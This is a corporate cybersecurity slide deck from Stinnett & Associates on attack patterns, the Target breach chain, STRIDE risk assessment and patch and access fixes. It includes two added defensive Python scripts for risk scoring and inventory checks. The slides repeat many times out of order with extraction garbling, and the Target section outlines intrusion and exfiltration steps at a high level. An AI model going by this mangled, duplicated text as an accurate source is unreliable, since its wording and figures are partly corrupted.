RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks: to identify, estimate and prioritize information security risks
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets.
• What Value Do the Assets Have?
  • Credit Card Data
  • Employee or Customer Records
  • Bank Accounts
  • Intellectual Property
  • Trade Secrets
  • Insider Knowledge
• Who Would Want the Data?
• Data Location
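The two slides above describe a workflow (identify assets and their locations, classify them by value, model threats with STRIDE, calculate and prioritize risk) without showing what the calculated results look like. The script below is an added example, not Stinnett's own method or tooling; the assets, threat ratings, scale, weights and banding thresholds are all constructed for illustration.

```python
"""Semi-qualitative STRIDE risk assessment over a small asset inventory.

Added example; it is not Stinnett's own method or tooling. It walks the
slide's workflow: identification of assets -> asset locations ->
classification -> STRIDE threat modeling -> calculated, prioritized risk
results. Every asset, threat rating, weight and threshold below is constructed.
"""
from dataclasses import dataclass

# The six Microsoft STRIDE threat categories.
STRIDE = (
    "Spoofing", "Tampering", "Repudiation",
    "Information disclosure", "Denial of service", "Elevation of privilege",
)

# Ordinal scale shared by likelihood, impact and asset classification (constructed).
SCALE = {"low": 1, "medium": 2, "high": 3}


@dataclass(frozen=True)
class Asset:
    name: str
    location: str          # where the data lives ("Data Location" on the slide)
    classification: str    # value of the asset to the company: low/medium/high
    wanted_by: tuple       # who would want the data (recorded for the report)
    internet_facing: bool = False


@dataclass(frozen=True)
class Threat:
    asset: str             # Asset.name this threat applies to
    category: str          # one STRIDE category
    likelihood: str        # low/medium/high, estimated in the assessment workshop
    impact: str            # low/medium/high


def risk_score(asset: Asset, threat: Threat) -> int:
    """likelihood x impact x classification (1..27); exposure raises likelihood."""
    if threat.category not in STRIDE:
        raise ValueError(f"not a STRIDE category: {threat.category!r}")
    likelihood = SCALE[threat.likelihood]
    if asset.internet_facing:            # reachable from the internet: one step up, capped
        likelihood = min(likelihood + 1, 3)
    return likelihood * SCALE[threat.impact] * SCALE[asset.classification]


def risk_band(score: int) -> str:
    """Map a numeric score to a reporting band (thresholds are constructed)."""
    if score >= 12:
        return "high"
    if score >= 6:
        return "medium"
    return "low"


def prioritize(assets, threats):
    """Return (score, band, asset name, STRIDE category) rows, highest risk first.

    Ties keep their input order, so list threats in the order they were raised.
    """
    by_name = {a.name: a for a in assets}
    rows = []
    for t in threats:
        if t.asset not in by_name:
            raise KeyError(f"threat refers to unknown asset {t.asset!r}")
        s = risk_score(by_name[t.asset], t)
        rows.append((s, risk_band(s), t.asset, t.category))
    return sorted(rows, key=lambda row: -row[0])


# Constructed inventory for a small retailer.
ASSETS = [
    Asset("Cardholder database", "PCI segment, primary data center", "high",
          ("organized crime",)),
    Asset("Customer web portal", "DMZ web tier", "medium",
          ("organized crime", "competitors"), internet_facing=True),
    Asset("HR records share", "Corporate file server", "high",
          ("insiders", "identity thieves")),
]

# Constructed threat register from the workshop, one STRIDE category per row.
THREATS = [
    Threat("Cardholder database", "Information disclosure", "medium", "high"),
    Threat("Customer web portal", "Tampering", "medium", "medium"),
    Threat("Customer web portal", "Denial of service", "high", "low"),
    Threat("HR records share", "Elevation of privilege", "low", "high"),
    Threat("Cardholder database", "Spoofing", "low", "high"),
]

if __name__ == "__main__":
    for score, band, asset, category in prioritize(ASSETS, THREATS):
        print(f"{score:>2} {band:<6} {asset:<22} {category}")
```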
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of Least Privilege is applied as much as possible. Within the IT department, the failure of Least Privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
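The device and ID inventories the fixes above call for are only useful once something ranks what is in them. The script below is an added example, not Stinnett's own tooling: it scores each inventoried device's patch risk, putting internet-facing devices and the commonly exploited software families named above first, and flags admin IDs whose access level has no documented reason or no owner. Hostnames, IDs, dates, weights and thresholds are all constructed.

```python
"""Patch and privileged-ID inventory checks for a baseline gap analysis.

Added example; it is not Stinnett's own tooling. It implements two of the
fixes on the slide: rank each device's patch risk (internet-facing devices
and commonly exploited software first) and flag admin IDs that break least
privilege. Devices, IDs, dates, weights and thresholds are all constructed.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Software families the slide names as frequent targets (Adobe, Java, browsers,
# operating systems), matched as case-insensitive substrings of the product name.
HIGH_RISK_SOFTWARE = ("adobe", "java", "chrome", "firefox", "windows", "linux")
OVERDUE_DAYS = 365   # the slide's point: exploitation mostly follows patches over a year old
STALE_DAYS = 30      # constructed threshold: behind, but not yet a year behind


@dataclass(frozen=True)
class Device:
    hostname: str
    software: str                     # product the oldest missing patch applies to
    patch_published: Optional[date]   # vendor release date of that patch; None = current
    internet_facing: bool


@dataclass(frozen=True)
class AccountId:
    user_id: str
    owner: str            # empty when nobody is recorded as the owner (shared ID)
    is_admin: bool
    justification: str    # why this access level is necessary


def patch_age_days(device: Device, today: date) -> int:
    """Days the device has been missing its oldest pending patch (0 if current)."""
    if device.patch_published is None:
        return 0
    age = (today - device.patch_published).days
    if age < 0:
        raise ValueError(f"{device.hostname}: patch date is in the future")
    return age


def patch_priority(device: Device, today: date) -> int:
    """0 = current; higher = remediate first (weights are constructed)."""
    age = patch_age_days(device, today)
    if age == 0:
        return 0
    score = 2 if age > OVERDUE_DAYS else (1 if age > STALE_DAYS else 0)
    if device.internet_facing:        # exposed to the internet outweighs everything else
        score += 2
    if any(s in device.software.lower() for s in HIGH_RISK_SOFTWARE):
        score += 1
    return score


def rank_patch_gaps(devices, today):
    """(hostname, priority, age in days), highest priority first, then by hostname."""
    rows = [(d.hostname, patch_priority(d, today), patch_age_days(d, today)) for d in devices]
    return sorted(rows, key=lambda r: (-r[1], r[0]))


def admin_id_gaps(ids):
    """Admin IDs that break least privilege: no documented reason, or no owner."""
    findings = []
    for a in ids:
        if not a.is_admin:
            continue
        if not a.justification.strip():
            findings.append((a.user_id, "admin access with no documented reason"))
        if not a.owner.strip():
            findings.append((a.user_id, "shared or unowned admin ID"))
    return findings


TODAY = date(2017, 10, 27)   # assessment date (constructed)

# Constructed device inventory: product of the oldest missing patch and its release date.
DEVICES = [
    Device("web-01", "Oracle Java JRE", date(2016, 4, 19), internet_facing=True),
    Device("fs-02", "Windows Server 2012", date(2017, 9, 12), internet_facing=False),
    Device("hr-db", "Oracle Database", date(2017, 10, 10), internet_facing=False),
    Device("kiosk-07", "Adobe Flash Player", date(2015, 12, 8), internet_facing=False),
    Device("mail-gw", "Postfix", None, internet_facing=True),
]

# Constructed user/admin ID inventory.
IDS = [
    AccountId("jdoe", "J. Doe", False, "accounts payable clerk"),
    AccountId("jdoe-adm", "J. Doe", True, "AP system administrator, approved 2017-03"),
    AccountId("svc_backup", "", True, "nightly backup job"),
    AccountId("admin2", "K. Lee", True, ""),
]

if __name__ == "__main__":
    for host, prio, age in rank_patch_gaps(DEVICES, TODAY):
        print(f"{prio} {host:<10} {age:>4} days behind")
    for user_id, finding in admin_id_gaps(IDS):
        print(f"{user_id:<12} {finding}")
```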
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates
8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and the use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
  - Email attachment
  - Cross-site scripting from a visited website
  - Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
